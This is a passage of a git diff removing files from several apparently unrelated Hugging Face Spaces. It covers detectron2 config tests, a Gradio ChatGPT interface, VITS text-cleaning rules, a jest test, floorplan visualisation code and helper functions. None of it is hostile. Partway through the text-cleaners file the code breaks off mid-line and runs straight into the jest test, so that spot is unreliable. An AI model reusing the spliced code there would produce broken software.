- - -import os -import tempfile -import unittest -import torch -from omegaconf import OmegaConf - -from detectron2 import model_zoo -from detectron2.config import configurable, downgrade_config, get_cfg, upgrade_config -from detectron2.layers import ShapeSpec -from detectron2.modeling import build_model - -_V0_CFG = """ -MODEL: - RPN_HEAD: - NAME: "TEST" -VERSION: 0 -""" - -_V1_CFG = """ -MODEL: - WEIGHT: "/path/to/weight" -""" - - -class TestConfigVersioning(unittest.TestCase): - def test_upgrade_downgrade_consistency(self): - cfg = get_cfg() - # check that custom is preserved - cfg.USER_CUSTOM = 1 - - down = downgrade_config(cfg, to_version=0) - up = upgrade_config(down) - self.assertTrue(up == cfg) - - def _merge_cfg_str(self, cfg, merge_str): - f = tempfile.NamedTemporaryFile(mode="w", suffix=".yaml", delete=False) - try: - f.write(merge_str) - f.close() - cfg.merge_from_file(f.name) - finally: - os.remove(f.name) - return cfg - - def test_auto_upgrade(self): - cfg = get_cfg() - latest_ver = cfg.VERSION - cfg.USER_CUSTOM = 1 - - self._merge_cfg_str(cfg, _V0_CFG) - - self.assertEqual(cfg.MODEL.RPN.HEAD_NAME, "TEST") - self.assertEqual(cfg.VERSION, latest_ver) - - def test_guess_v1(self): - cfg = get_cfg() - latest_ver = cfg.VERSION - self._merge_cfg_str(cfg, _V1_CFG) - self.assertEqual(cfg.VERSION, latest_ver) - - -class _TestClassA(torch.nn.Module): - @configurable - def __init__(self, arg1, arg2, arg3=3): - super().__init__() - self.arg1 = arg1 - self.arg2 = arg2 - self.arg3 = arg3 - assert arg1 == 1 - assert arg2 == 2 - assert arg3 == 3 - - @classmethod - def from_config(cls, cfg): - args = {"arg1": cfg.ARG1, "arg2": cfg.ARG2} - return args - - -class _TestClassB(_TestClassA): - @configurable - def __init__(self, input_shape, arg1, arg2, arg3=3): - """ - Doc of _TestClassB - """ - assert input_shape == "shape" - super().__init__(arg1, arg2, arg3) - - @classmethod - def from_config(cls, cfg, input_shape): # test extra positional arg in from_config - args = 
{"arg1": cfg.ARG1, "arg2": cfg.ARG2} - args["input_shape"] = input_shape - return args - - -class _LegacySubClass(_TestClassB): - # an old subclass written in cfg style - def __init__(self, cfg, input_shape, arg4=4): - super().__init__(cfg, input_shape) - assert self.arg1 == 1 - assert self.arg2 == 2 - assert self.arg3 == 3 - - -class _NewSubClassNewInit(_TestClassB): - # test new subclass with a new __init__ - @configurable - def __init__(self, input_shape, arg4=4, **kwargs): - super().__init__(input_shape, **kwargs) - assert self.arg1 == 1 - assert self.arg2 == 2 - assert self.arg3 == 3 - - -class _LegacySubClassNotCfg(_TestClassB): - # an old subclass written in cfg style, but argument is not called "cfg" - def __init__(self, config, input_shape): - super().__init__(config, input_shape) - assert self.arg1 == 1 - assert self.arg2 == 2 - assert self.arg3 == 3 - - -class _TestClassC(_TestClassB): - @classmethod - def from_config(cls, cfg, input_shape, **kwargs): # test extra kwarg overwrite - args = {"arg1": cfg.ARG1, "arg2": cfg.ARG2} - args["input_shape"] = input_shape - args.update(kwargs) - return args - - -class _TestClassD(_TestClassA): - @configurable - def __init__(self, input_shape: ShapeSpec, arg1: int, arg2, arg3=3): - assert input_shape == "shape" - super().__init__(arg1, arg2, arg3) - - # _TestClassA.from_config does not have input_shape args. 
- # Test whether input_shape will be forwarded to __init__ - - -@configurable(from_config=lambda cfg, arg2: {"arg1": cfg.ARG1, "arg2": arg2, "arg3": cfg.ARG3}) -def _test_func(arg1, arg2=2, arg3=3, arg4=4): - return arg1, arg2, arg3, arg4 - - -class TestConfigurable(unittest.TestCase): - def testInitWithArgs(self): - _ = _TestClassA(arg1=1, arg2=2, arg3=3) - _ = _TestClassB("shape", arg1=1, arg2=2) - _ = _TestClassC("shape", arg1=1, arg2=2) - _ = _TestClassD("shape", arg1=1, arg2=2, arg3=3) - - def testPatchedAttr(self): - self.assertTrue("Doc" in _TestClassB.__init__.__doc__) - self.assertEqual(_TestClassD.__init__.__annotations__["arg1"], int) - - def testInitWithCfg(self): - cfg = get_cfg() - cfg.ARG1 = 1 - cfg.ARG2 = 2 - cfg.ARG3 = 3 - _ = _TestClassA(cfg) - _ = _TestClassB(cfg, input_shape="shape") - _ = _TestClassC(cfg, input_shape="shape") - _ = _TestClassD(cfg, input_shape="shape") - _ = _LegacySubClass(cfg, input_shape="shape") - _ = _NewSubClassNewInit(cfg, input_shape="shape") - _ = _LegacySubClassNotCfg(cfg, input_shape="shape") - with self.assertRaises(TypeError): - # disallow forwarding positional args to __init__ since it's prone to errors - _ = _TestClassD(cfg, "shape") - - # call with kwargs instead - _ = _TestClassA(cfg=cfg) - _ = _TestClassB(cfg=cfg, input_shape="shape") - _ = _TestClassC(cfg=cfg, input_shape="shape") - _ = _TestClassD(cfg=cfg, input_shape="shape") - _ = _LegacySubClass(cfg=cfg, input_shape="shape") - _ = _NewSubClassNewInit(cfg=cfg, input_shape="shape") - _ = _LegacySubClassNotCfg(config=cfg, input_shape="shape") - - def testInitWithCfgOverwrite(self): - cfg = get_cfg() - cfg.ARG1 = 1 - cfg.ARG2 = 999 # wrong config - with self.assertRaises(AssertionError): - _ = _TestClassA(cfg, arg3=3) - - # overwrite arg2 with correct config later: - _ = _TestClassA(cfg, arg2=2, arg3=3) - _ = _TestClassB(cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassC(cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassD(cfg, 
input_shape="shape", arg2=2, arg3=3) - - # call with kwargs cfg=cfg instead - _ = _TestClassA(cfg=cfg, arg2=2, arg3=3) - _ = _TestClassB(cfg=cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassC(cfg=cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassD(cfg=cfg, input_shape="shape", arg2=2, arg3=3) - - def testInitWithCfgWrongArgs(self): - cfg = get_cfg() - cfg.ARG1 = 1 - cfg.ARG2 = 2 - with self.assertRaises(TypeError): - _ = _TestClassB(cfg, "shape", not_exist=1) - with self.assertRaises(TypeError): - _ = _TestClassC(cfg, "shape", not_exist=1) - with self.assertRaises(TypeError): - _ = _TestClassD(cfg, "shape", not_exist=1) - - def testBadClass(self): - class _BadClass1: - @configurable - def __init__(self, a=1, b=2): - pass - - class _BadClass2: - @configurable - def __init__(self, a=1, b=2): - pass - - def from_config(self, cfg): # noqa - pass - - class _BadClass3: - @configurable - def __init__(self, a=1, b=2): - pass - - # bad name: must be cfg - @classmethod - def from_config(cls, config): # noqa - pass - - with self.assertRaises(AttributeError): - _ = _BadClass1(a=1) - - with self.assertRaises(TypeError): - _ = _BadClass2(a=1) - - with self.assertRaises(TypeError): - _ = _BadClass3(get_cfg()) - - def testFuncWithCfg(self): - cfg = get_cfg() - cfg.ARG1 = 10 - cfg.ARG3 = 30 - - self.assertEqual(_test_func(1), (1, 2, 3, 4)) - with self.assertRaises(TypeError): - _test_func(cfg) - self.assertEqual(_test_func(cfg, arg2=2), (10, 2, 30, 4)) - self.assertEqual(_test_func(cfg, arg1=100, arg2=20), (100, 20, 30, 4)) - self.assertEqual(_test_func(cfg, arg1=100, arg2=20, arg4=40), (100, 20, 30, 40)) - - self.assertTrue(callable(_test_func.from_config)) - - def testOmegaConf(self): - cfg = model_zoo.get_config("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml") - cfg = OmegaConf.create(cfg.dump()) - if not torch.cuda.is_available(): - cfg.MODEL.DEVICE = "cpu" - # test that a model can be built with omegaconf config as well - build_model(cfg) diff --git 
a/spaces/yooch/yooch/ChuanhuChatbot.py b/spaces/yooch/yooch/ChuanhuChatbot.py deleted file mode 100644 index 006cab5e4dc7b121990f5baec5e888f00a3a5aeb..0000000000000000000000000000000000000000 --- a/spaces/yooch/yooch/ChuanhuChatbot.py +++ /dev/null @@ -1,159 +0,0 @@ -import gradio as gr -# import openai -import os -import sys -import argparse -from utils import * -from presets import * - - -my_api_key = "" # 在这里输入你的 API 密钥 - -#if we are running in Docker -if os.environ.get('dockerrun') == 'yes': - dockerflag = True -else: - dockerflag = False - -authflag = False - -if dockerflag: - my_api_key = os.environ.get('my_api_key') - if my_api_key == "empty": - print("Please give a api key!") - sys.exit(1) - #auth - username = os.environ.get('USERNAME') - password = os.environ.get('PASSWORD') - if not (isinstance(username, type(None)) or isinstance(password, type(None))): - authflag = True -else: - if not my_api_key and os.path.exists("api_key.txt") and os.path.getsize("api_key.txt"): - with open("api_key.txt", "r") as f: - my_api_key = f.read().strip() - if os.path.exists("auth.json"): - with open("auth.json", "r") as f: - auth = json.load(f) - username = auth["username"] - password = auth["password"] - if username != "" and password != "": - authflag = True - -gr.Chatbot.postprocess = postprocess - -with gr.Blocks(css=customCSS) as demo: - gr.HTML(title) - with gr.Row(): - keyTxt = gr.Textbox(show_label=False, placeholder=f"在这里输入你的OpenAI API-key...", - value=my_api_key, type="password", visible=not HIDE_MY_KEY).style(container=True) - use_streaming_checkbox = gr.Checkbox(label="实时传输回答", value=True, visible=enable_streaming_option) - chatbot = gr.Chatbot() # .style(color_map=("#1D51EE", "#585A5B")) - history = gr.State([]) - token_count = gr.State([]) - promptTemplates = gr.State(load_template(get_template_names(plain=True)[0], mode=2)) - TRUECOMSTANT = gr.State(True) - FALSECONSTANT = gr.State(False) - topic = gr.State("未命名对话历史记录") - - with gr.Row(): - with 
gr.Column(scale=12): - user_input = gr.Textbox(show_label=False, placeholder="在这里输入").style( - container=False) - with gr.Column(min_width=50, scale=1): - submitBtn = gr.Button("🚀", variant="primary") - with gr.Row(): - emptyBtn = gr.Button("🧹 新的对话") - retryBtn = gr.Button("🔄 重新生成") - delLastBtn = gr.Button("🗑️ 删除最近一条对话") - reduceTokenBtn = gr.Button("♻️ 总结对话") - status_display = gr.Markdown("status: ready") - systemPromptTxt = gr.Textbox(show_label=True, placeholder=f"在这里输入System Prompt...", - label="System prompt", value=initial_prompt).style(container=True) - with gr.Accordion(label="加载Prompt模板", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - templateFileSelectDropdown = gr.Dropdown(label="选择Prompt模板集合文件", choices=get_template_names(plain=True), multiselect=False, value=get_template_names(plain=True)[0]) - with gr.Column(scale=1): - templateRefreshBtn = gr.Button("🔄 刷新") - templaeFileReadBtn = gr.Button("📂 读入模板") - with gr.Row(): - with gr.Column(scale=6): - templateSelectDropdown = gr.Dropdown(label="从Prompt模板中加载", choices=load_template(get_template_names(plain=True)[0], mode=1), multiselect=False, value=load_template(get_template_names(plain=True)[0], mode=1)[0]) - with gr.Column(scale=1): - templateApplyBtn = gr.Button("⬇️ 应用") - with gr.Accordion(label="保存/加载对话历史记录", open=False): - with gr.Column(): - with gr.Row(): - with gr.Column(scale=6): - saveFileName = gr.Textbox( - show_label=True, placeholder=f"在这里输入保存的文件名...", label="设置保存文件名", value="对话历史记录").style(container=True) - with gr.Column(scale=1): - saveHistoryBtn = gr.Button("💾 保存对话") - with gr.Row(): - with gr.Column(scale=6): - historyFileSelectDropdown = gr.Dropdown(label="从列表中加载对话", choices=get_history_names(plain=True), multiselect=False, value=get_history_names(plain=True)[0]) - with gr.Column(scale=1): - historyRefreshBtn = gr.Button("🔄 刷新") - historyReadBtn = gr.Button("📂 读入对话") - #inputs, top_p, temperature, top_k, repetition_penalty - with gr.Accordion("参数", 
open=False): - top_p = gr.Slider(minimum=-0, maximum=1.0, value=1.0, step=0.05, - interactive=True, label="Top-p (nucleus sampling)",) - temperature = gr.Slider(minimum=-0, maximum=5.0, value=1.0, - step=0.1, interactive=True, label="Temperature",) - #top_k = gr.Slider( minimum=1, maximum=50, value=4, step=1, interactive=True, label="Top-k",) - #repetition_penalty = gr.Slider( minimum=0.1, maximum=3.0, value=1.03, step=0.01, interactive=True, label="Repetition Penalty", ) - gr.Markdown(description) - - - user_input.submit(predict, [keyTxt, systemPromptTxt, history, user_input, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - user_input.submit(reset_textbox, [], [user_input]) - - submitBtn.click(predict, [keyTxt, systemPromptTxt, history, user_input, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - submitBtn.click(reset_textbox, [], [user_input]) - - emptyBtn.click(reset_state, outputs=[chatbot, history, token_count, status_display], show_progress=True) - - retryBtn.click(retry, [keyTxt, systemPromptTxt, history, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - - delLastBtn.click(delete_last_conversation, [chatbot, history, token_count, use_streaming_checkbox], [ - chatbot, history, token_count, status_display], show_progress=True) - - reduceTokenBtn.click(reduce_token_size, [keyTxt, systemPromptTxt, history, chatbot, token_count, top_p, temperature, use_streaming_checkbox], [chatbot, history, status_display, token_count], show_progress=True) - - saveHistoryBtn.click(save_chat_history, [ - saveFileName, systemPromptTxt, history, chatbot], None, show_progress=True) - - saveHistoryBtn.click(get_history_names, None, [historyFileSelectDropdown]) - - historyRefreshBtn.click(get_history_names, None, 
[historyFileSelectDropdown]) - - historyReadBtn.click(load_chat_history, [historyFileSelectDropdown, systemPromptTxt, history, chatbot], [saveFileName, systemPromptTxt, history, chatbot], show_progress=True) - - templateRefreshBtn.click(get_template_names, None, [templateFileSelectDropdown]) - - templaeFileReadBtn.click(load_template, [templateFileSelectDropdown], [promptTemplates, templateSelectDropdown], show_progress=True) - - templateApplyBtn.click(get_template_content, [promptTemplates, templateSelectDropdown, systemPromptTxt], [systemPromptTxt], show_progress=True) - -print("yooch的温馨提示:访问 http://localhost:7860 查看界面") -# 默认开启本地服务器,默认可以直接从IP访问,默认不创建公开分享链接 -demo.title = "yoochChatGPT 🚀" - -if __name__ == "__main__": - #if running in Docker - if dockerflag: - if authflag: - demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=(username, password)) - else: - demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) - #if not running in Docker - else: - if authflag: - demo.queue().launch(share=False, auth=(username, password)) - else: - demo.queue().launch(share=False) # 改为 share=True 可以创建公开分享链接 - #demo.queue().launch(server_name="0.0.0.0", server_port=7860, share=False) # 可自定义端口 - #demo.queue().launch(server_name="0.0.0.0", server_port=7860,auth=("在这里填写用户名", "在这里填写密码")) # 可设置用户名与密码 - #demo.queue().launch(auth=("在这里填写用户名", "在这里填写密码")) # 适合Nginx反向代理 diff --git a/spaces/ypx123/vits-uma-genshin-honkai/text/cleaners.py b/spaces/ypx123/vits-uma-genshin-honkai/text/cleaners.py deleted file mode 100644 index d26581deb399609163518054718ad80ecca5d934..0000000000000000000000000000000000000000 --- a/spaces/ypx123/vits-uma-genshin-honkai/text/cleaners.py +++ /dev/null @@ -1,475 +0,0 @@ -""" from https://github.com/keithito/tacotron """ - -''' -Cleaners are transformations that run over the input text at both training and eval time. - -Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" -hyperparameter. 
Some cleaners are English-specific. You'll typically want to use: - 1. "english_cleaners" for English text - 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using - the Unidecode library (https://pypi.python.org/pypi/Unidecode) - 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update - the symbols in symbols.py to match your data). -''' - -import re -from unidecode import unidecode -import pyopenjtalk -from jamo import h2j, j2hcj -from pypinyin import lazy_pinyin, BOPOMOFO -import jieba, cn2an - - -# This is a list of Korean classifiers preceded by pure Korean numerals. -_korean_classifiers = '군데 권 개 그루 닢 대 두 마리 모 모금 뭇 발 발짝 방 번 벌 보루 살 수 술 시 쌈 움큼 정 짝 채 척 첩 축 켤레 톨 통' - -# Regular expression matching whitespace: -_whitespace_re = re.compile(r'\s+') - -# Regular expression matching Japanese without punctuation marks: -_japanese_characters = re.compile(r'[A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# Regular expression matching non-Japanese characters or punctuation marks: -_japanese_marks = re.compile(r'[^A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# List of (regular expression, replacement) pairs for abbreviations: -_abbreviations = [(re.compile('\\b%s\\.' 
% x[0], re.IGNORECASE), x[1]) for x in [ - ('mrs', 'misess'), - ('mr', 'mister'), - ('dr', 'doctor'), - ('st', 'saint'), - ('co', 'company'), - ('jr', 'junior'), - ('maj', 'major'), - ('gen', 'general'), - ('drs', 'doctors'), - ('rev', 'reverend'), - ('lt', 'lieutenant'), - ('hon', 'honorable'), - ('sgt', 'sergeant'), - ('capt', 'captain'), - ('esq', 'esquire'), - ('ltd', 'limited'), - ('col', 'colonel'), - ('ft', 'fort'), -]] - -# List of (hangul, hangul divided) pairs: -_hangul_divided = [(re.compile('%s' % x[0]), x[1]) for x in [ - ('ㄳ', 'ㄱㅅ'), - ('ㄵ', 'ㄴㅈ'), - ('ㄶ', 'ㄴㅎ'), - ('ㄺ', 'ㄹㄱ'), - ('ㄻ', 'ㄹㅁ'), - ('ㄼ', 'ㄹㅂ'), - ('ㄽ', 'ㄹㅅ'), - ('ㄾ', 'ㄹㅌ'), - ('ㄿ', 'ㄹㅍ'), - ('ㅀ', 'ㄹㅎ'), - ('ㅄ', 'ㅂㅅ'), - ('ㅘ', 'ㅗㅏ'), - ('ㅙ', 'ㅗㅐ'), - ('ㅚ', 'ㅗㅣ'), - ('ㅝ', 'ㅜㅓ'), - ('ㅞ', 'ㅜㅔ'), - ('ㅟ', 'ㅜㅣ'), - ('ㅢ', 'ㅡㅣ'), - ('ㅑ', 'ㅣㅏ'), - ('ㅒ', 'ㅣㅐ'), - ('ㅕ', 'ㅣㅓ'), - ('ㅖ', 'ㅣㅔ'), - ('ㅛ', 'ㅣㅗ'), - ('ㅠ', 'ㅣㅜ') -]] - -# List of (Latin alphabet, hangul) pairs: -_latin_to_hangul = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', '에이'), - ('b', '비'), - ('c', '시'), - ('d', '디'), - ('e', '이'), - ('f', '에프'), - ('g', '지'), - ('h', '에이치'), - ('i', '아이'), - ('j', '제이'), - ('k', '케이'), - ('l', '엘'), - ('m', '엠'), - ('n', '엔'), - ('o', '오'), - ('p', '피'), - ('q', '큐'), - ('r', '아르'), - ('s', '에스'), - ('t', '티'), - ('u', '유'), - ('v', '브이'), - ('w', '더블유'), - ('x', '엑스'), - ('y', '와이'), - ('z', '제트') -]] - -# List of (Latin alphabet, bopomofo) pairs: -_latin_to_bopomofo = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', 'ㄟˉ'), - ('b', 'ㄅㄧˋ'), - ('c', 'ㄙㄧˉ'), - ('d', 'ㄉㄧˋ'), - ('e', 'ㄧˋ'), - ('f', 'ㄝˊㄈㄨˋ'), - ('g', 'ㄐㄧˋ'), - ('h', 'ㄝˇㄑㄩˋ'), - ('i', 'ㄞˋ'), - ('j', 'ㄐㄟˋ'), - ('k', 'ㄎㄟˋ'), - ('l', 'ㄝˊㄛˋ'), - ('m', 'ㄝˊㄇㄨˋ'), - ('n', 'ㄣˉ'), - ('o', 'ㄡˉ'), - ('p', 'ㄆㄧˉ'), - ('q', 'ㄎㄧㄡˉ'), - ('r', 'ㄚˋ'), - ('s', 'ㄝˊㄙˋ'), - ('t', 'ㄊㄧˋ'), - ('u', 'ㄧㄡˉ'), - ('v', 'ㄨㄧˉ'), - ('w', 'ㄉㄚˋㄅㄨˋㄌㄧㄡˋ'), - ('x', 'ㄝˉㄎㄨˋㄙˋ'), - ('y', 'ㄨㄞˋ'), - ('z', 'ㄗㄟˋ') -]] - - -# List of (bopomofo, 
romaji) pairs: -_bopomofo_to_romaji = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('ㄅㄛ', 'p⁼wo'), - ('ㄆㄛ', 'pʰwo'), - ('ㄇㄛ', 'mwo'), - ('ㄈㄛ', 'fwo'), - ('ㄅ', 'p⁼'), - ('ㄆ', 'pʰ'), - ('ㄇ', 'm'), - ('ㄈ', 'f'), - ('ㄉ', 't⁼'), - ('ㄊ', 'tʰ'), - ('ㄋ', 'n'), - ('ㄌ', 'l'), - ('ㄍ', 'k⁼'), - ('ㄎ', 'kʰ'), - ('ㄏ', 'h'), - ('ㄐ', 'ʧ⁼'), - ('ㄑ', 'ʧʰ'), - ('ㄒ', 'ʃ'), - ('ㄓ', 'ʦ`⁼'), - ('ㄔ', 'ʦ`ʰ'), - ('ㄕ', 's`'), - ('ㄖ', 'ɹ`'), - ('ㄗ', 'ʦ⁼'), - ('ㄘ', 'ʦʰ'), - ('ㄙ', 's'), - ('ㄚ', 'a'), - ('ㄛ', 'o'), - ('ㄜ', 'ə'), - ('ㄝ', 'e'), - ('ㄞ', 'ai'), - ('ㄟ', 'ei'), - ('ㄠ', 'au'), - ('ㄡ', 'ou'), - ('ㄧㄢ', 'yeNN'), - ('ㄢ', 'aNN'), - ('ㄧㄣ', 'iNN'), - ('ㄣ', 'əNN'), - ('ㄤ', 'aNg'), - ('ㄧㄥ', 'iNg'), - ('ㄨㄥ', 'uNg'), - ('ㄩㄥ', 'yuNg'), - ('ㄥ', 'əNg'), - ('ㄦ', 'əɻ'), - ('ㄧ', 'i'), - ('ㄨ', 'u'), - ('ㄩ', 'ɥ'), - ('ˉ', '→'), - ('ˊ', '↑'), - ('ˇ', '↓↑'), - ('ˋ', '↓'), - ('˙', ''), - (',', ','), - ('。', '.'), - ('!', '!'), - ('?', '?'), - ('—', '-') -]] - - -def expand_abbreviations(text): - for regex, replacement in _abbreviations: - text = re.sub(regex, replacement, text) - return text - - -def lowercase(text): - return text.lower() - - -def collapse_whitespace(text): - return re.sub(_whitespace_re, ' ', text) - - -def convert_to_ascii(text): - return unidecode(text) - - -def japanese_to_romaji_with_accent(text): - '''Reference https://r9y9.github.io/ttslearn/latest/notebooks/ch10_Recipe-Tacotron.html''' - sentences = re.split(_japanese_marks, text) - marks = re.findall(_japanese_marks, text) - text = '' - for i, sentence in enumerate(sentences): - if re.match(_japanese_characters, sentence): - if text!='': - text+=' ' - labels = pyopenjtalk.extract_fullcontext(sentence) - for n, label in enumerate(labels): - phoneme = re.search(r'\-([^\+]*)\+', label).group(1) - if phoneme not in ['sil','pau']: - text += phoneme.replace('ch','ʧ').replace('sh','ʃ').replace('cl','Q') - else: - continue - n_moras = int(re.search(r'/F:(\d+)_', label).group(1)) - a1 = int(re.search(r"/A:(\-?[0-9]+)\+", 
label).group(1)) - a2 = int(re.search(r"\+(\d+)\+", label).group(1)) - a3 = int(re.search(r"\+(\d+)/", label).group(1)) - if re.search(r'\-([^\+]*)\+', labels[n + 1]).group(1) in ['sil','pau']: - a2_next=-1 - else: - a2_next = int(re.search(r"\+(\d+)\+", labels[n + 1]).group(1)) - # Accent phrase boundary - if a3 == 1 and a2_next == 1: - text += ' ' - # Falling - elif a1 == 0 and a2_next == a2 + 1 and a2 != n_moras: - text += '↓' - # Rising - elif a2 == 1 and a2_next == 2: - text += '↑' - if i jest.fn().mockResolvedValue('2.0.0')); - -beforeEach(jest.clearAllMocks); - -test('it logs message if update is available', async () => { - await simpleUpdateNotifier({ - pkg: { name: 'test', version: '1.0.0' }, - alwaysRun: true, - }); - - expect(consoleSpy).toHaveBeenCalledTimes(1); -}); - -test('it does not log message if update is not available', async () => { - (hasNewVersion as jest.Mock).mockResolvedValue(false); - await simpleUpdateNotifier({ - pkg: { name: 'test', version: '2.0.0' }, - alwaysRun: true, - }); - - expect(consoleSpy).toHaveBeenCalledTimes(0); -}); diff --git a/spaces/zhigangjiang/3D-Room-Layout-Estimation_LGT-Net/visualization/floorplan.py b/spaces/zhigangjiang/3D-Room-Layout-Estimation_LGT-Net/visualization/floorplan.py deleted file mode 100644 index 84f772d9e907a1a93e13e385ad20d2dc9141022d..0000000000000000000000000000000000000000 --- a/spaces/zhigangjiang/3D-Room-Layout-Estimation_LGT-Net/visualization/floorplan.py +++ /dev/null @@ -1,147 +0,0 @@ -""" -@date: 2021/6/29 -@description: -""" -import cv2 - - -import matplotlib.pyplot as plt - -from PIL import Image -from utils.boundary import * - - -def draw_floorplan(xz, fill_color=None, border_color=None, side_l=512, show_radius=None, show=False, marker_color=None, - center_color=None, scale=1.5): - """ - :param scale: - :param center_color: - :param marker_color: for corners marking - :param fill_color: - :param border_color: boundary color - :param xz: [[x1, z1], [x2, z2], ....] 
- :param side_l: side length (pixel) of the output result - :param show_radius: The displayed maximum radius m (proportional to the projection plane plan_y of xz), - such as set to 1, means that the pixel value of side_l/2 is expressed as 1m, if not set this value to display all - :param show: - :return: - """ - if fill_color is None: - fill_color = [1] - - board = np.zeros([side_l, side_l, len(fill_color)], dtype=np.float32) - - if show_radius is None: - show_radius = np.linalg.norm(xz, axis=-1).max() - - xz = xz * side_l / (2*scale) / show_radius - # v<-----------|o - # | | | - # | ----|----z | - # | | | - # | x \|/ - # |------------u - xz[:, 1] = -xz[:, 1] - xz += side_l // 2 # moving to center - xz = xz.astype(np.int32) - cv2.fillPoly(board, [xz], fill_color) - if border_color: - cv2.drawContours(board, [xz], 0, border_color, 2) - - if marker_color is not None: - for p in xz: - cv2.drawMarker(board, tuple(p), marker_color, markerType=0, markerSize=10, thickness=2) - if center_color is not None: - cv2.drawMarker(board, tuple([side_l // 2, side_l // 2]), center_color, markerType=0, markerSize=10, thickness=2) - - if show: - # plt.rcParams['figure.dpi'] = 300 - plt.axis('off') - plt.imshow(board[..., 0] if board.shape[-1] == 1 else board) - plt.show() - - return board - - -def draw_iou_floorplan(dt_xz, gt_xz, show_radius=None, show=False, side_l=512, - iou_2d=None, iou_3d=None, dt_board_color=None, gt_board_color=None): - """ - :param gt_board_color: - :param dt_board_color: - :param dt_xz: [[x1, z1], [x2, z2], ....] - :param gt_xz: [[x1, z1], [x2, z2], ....] 
- :param show: - :param side_l: side length (pixel) of the output result - :param show_radius: The displayed maximum radius m (proportional to the projection plane plan_y of xz), - such as set to 1, means that the pixel value of side_l/2 is expressed as 1m, if not set this value to display all - :param iou_2d: - :param iou_3d: - :return: - """ - if dt_board_color is None: - dt_board_color = [0, 1, 0, 1] - if gt_board_color is None: - gt_board_color = [0, 0, 1, 1] - center_color = [1, 0, 0, 1] - fill_color = [0.2, 0.2, 0.2, 0.2] - - if show_radius is None: - # uniform scale - gt_radius = np.linalg.norm(gt_xz, axis=-1).max() - dt_radius = np.linalg.norm(dt_xz, axis=-1).max() - show_radius = gt_radius if gt_radius > dt_radius else dt_radius - - dt_floorplan = draw_floorplan(dt_xz, show_radius=show_radius, fill_color=fill_color, - border_color=dt_board_color, side_l=side_l, show=False) - gt_floorplan = draw_floorplan(gt_xz, show_radius=show_radius, fill_color=fill_color, - border_color=gt_board_color, side_l=side_l, show=False, - center_color=[1, 0, 0, 1]) - - dt_floorplan = Image.fromarray((dt_floorplan * 255).astype(np.uint8), mode='RGBA') - gt_floorplan = Image.fromarray((gt_floorplan * 255).astype(np.uint8), mode='RGBA') - iou_floorplan = Image.alpha_composite(gt_floorplan, dt_floorplan) - - back = np.zeros([side_l, side_l, len(fill_color)], dtype=np.float32) - back[..., :] = [0.8, 0.8, 0.8, 1] - back = Image.fromarray((back * 255).astype(np.uint8), mode='RGBA') - - iou_floorplan = Image.alpha_composite(back, iou_floorplan).convert("RGB") - iou_floorplan = np.array(iou_floorplan) / 255.0 - - if iou_2d is not None: - cv2.putText(iou_floorplan, f'2d:{iou_2d * 100:.2f}', (10, 30), 2, 1, (0, 0, 0), 1) - if iou_3d is not None: - cv2.putText(iou_floorplan, f'3d:{iou_3d * 100:.2f}', (10, 60), 2, 1, (0, 0, 0), 1) - - if show: - plt.axis('off') - plt.imshow(iou_floorplan) - plt.show() - return iou_floorplan - - -if __name__ == '__main__': - import numpy as np - from 
dataset.mp3d_dataset import MP3DDataset - from utils.boundary import depth2boundaries - from utils.conversion import uv2xyz - from visualization.boundary import draw_boundaries - - mp3d_dataset = MP3DDataset(root_dir='../src/dataset/mp3d', mode='train') - gt = mp3d_dataset.__getitem__(0) - - # boundary_list = depth2boundaries(gt['ratio'], gt['depth'], step=None) - # pano_img = draw_boundaries(gt['image'].transpose(1, 2, 0), boundary_list=boundary_list, show=True) - # draw_floorplan(uv2xyz(boundary_list[0])[..., ::2], show=True, marker_color=None, center_color=0.8) - # draw_floorplan(depth2xyz(gt['depth'])[..., ::2], show=True, marker_color=None, center_color=0.8) - - corners = gt['corners'][gt['corners'][..., 0] + gt['corners'][..., 1] != 0] - dt_corners = corners + 0.1 - # img = draw_floorplan(uv2xyz(corners)[..., ::2], show=True, fill_color=[0.8, 0.8, 0.8, 0.2], - # marker_color=None, center_color=[1, 0, 0, 1], border_color=[0, 0, 1, 1]) - # cv2.imwrite('../src/fig/flp.png', (img*255).astype(np.uint8)) - - img = draw_iou_floorplan(uv2xyz(dt_corners)[..., ::2], uv2xyz(corners)[..., ::2], side_l=512, show=True) - img[..., 0:3] = img[..., 0:3][..., ::-1] - # cv2.imwrite('../src/fig/flp.png', (img*255).astype(np.uint8)) - diff --git a/spaces/zhoucr/ai-koni/commons.py b/spaces/zhoucr/ai-koni/commons.py deleted file mode 100644 index 9ad0444b61cbadaa388619986c2889c707d873ce..0000000000000000000000000000000000000000 --- a/spaces/zhoucr/ai-koni/commons.py +++ /dev/null @@ -1,161 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape 
